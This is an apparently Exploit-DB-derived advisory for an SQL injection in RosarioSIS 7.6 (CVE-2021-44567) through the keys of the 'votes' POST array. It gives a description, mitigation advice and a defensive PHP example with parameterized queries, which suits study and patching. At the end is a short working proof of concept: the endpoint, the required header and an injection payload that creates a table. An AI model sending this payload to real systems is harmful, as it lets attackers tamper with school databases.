Vendor: RosarioSIS
By: CodeSecLab
CVSS: 6.1 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: RosarioSIS
Affected Version From: 7.6
Affected Version To: 7.6
Patch Exists: NO
Related CVE: CVE-2021-44567
CPE: a:rosariosis_project:rosariosis:7.6
Metasploit:
Other Scripts:
Platforms Tested: Ubuntu, Windows
2024

RosarioSIS 7.6 – SQL Injection

RosarioSIS 7.6 is vulnerable to SQL injection through the 'votes' POST parameter handled by ProgramFunctions/PortalPollsNotes.fnc.php. 'votes' is an array, and each of its keys is passed as the poll ID to PortalPollsVote(), so an attacker who manipulates the parameter can inject malicious SQL queries. This can lead to unauthorized access to the database, data manipulation, and potentially further exploitation of the system. The vulnerability has been assigned the identifier CVE-2021-44567.

Mitigation:

To mitigate this issue, input validation should be implemented on the server-side to ensure that user-supplied data is sanitized and does not contain SQL injection payloads. Additionally, the use of parameterized queries or ORM frameworks can help prevent SQL injection attacks.
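One way to apply both mitigations to the 'votes' array, as an added example that is not RosarioSIS code. The function names, the table `poll_votes_example` and the in-memory SQLite database (PDO SQLite driver) are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Added example: names and schema are hypothetical, not RosarioSIS's own.

// Array keys of $_POST['votes'] are attacker-controlled, just like values.
// Keep only entries whose key (poll id) and values are non-negative integers.
function filter_votes(array $raw): array
{
    $clean = [];
    foreach ($raw as $poll_id => $options) {
        // PHP turns canonical numeric keys into int; any other key stays a string.
        if (!is_int($poll_id) || $poll_id < 0) {
            continue; // drops keys that carry SQL text
        }
        $opts = [];
        foreach ((array) $options as $opt) {
            if (is_int($opt) || (is_string($opt) && ctype_digit($opt))) {
                $opts[] = (int) $opt;
            }
        }
        if ($opts !== []) {
            $clean[$poll_id] = $opts;
        }
    }
    return $clean;
}

function record_votes(PDO $db, array $raw): int
{
    // Bound placeholders keep data out of the SQL text even if a check is missed.
    $sql = 'INSERT INTO poll_votes_example (poll_id, option_idx) VALUES (:poll, :opt)';
    $stmt = $db->prepare($sql);
    $rows = 0;
    foreach (filter_votes($raw) as $poll_id => $opts) {
        foreach ($opts as $opt) {
            $stmt->execute([':poll' => $poll_id, ':opt' => $opt]);
            $rows++;
        }
    }
    return $rows;
}

// Constructed sample: one valid entry and one whose key is SQL text.
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE poll_votes_example (poll_id INTEGER, option_idx INTEGER)');
$sample = ['12' => ['0', '2'], "'; CREATE TABLE aaa(t text) --" => '1'];
echo record_votes($db, $sample), " rows stored\n";
```

The key check and the bound parameters are independent layers: the first rejects malformed poll IDs early, the second ensures that whatever reaches the query is treated as data.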
Source

Exploit-DB raw data:

# Exploit Title: RosarioSIS 7.6 - SQL Injection
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://gitlab.com/francoisjacquet/rosariosis
# Software Link: https://gitlab.com/francoisjacquet/rosariosis
# Version: 7.6
# Tested on: Ubuntu Windows
# CVE : CVE-2021-44567

PoC:

POST /ProgramFunctions/PortalPollsNotes.fnc.php HTTP/1.1
X-Requested-With: XMLHttpRequest

Constraints and some flow:
isset( $_POST['votes'] ) && is_array( $_POST['votes'] ) && $_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest' && foreach ( (array) $_POST['votes'] as $poll_id => $votes_array ) && if ( ! empty( $votes_array ) ) && PortalPollsVote( $poll_id, $votes_array ) 

votes['; CREATE TABLE aaa(t text) --]=1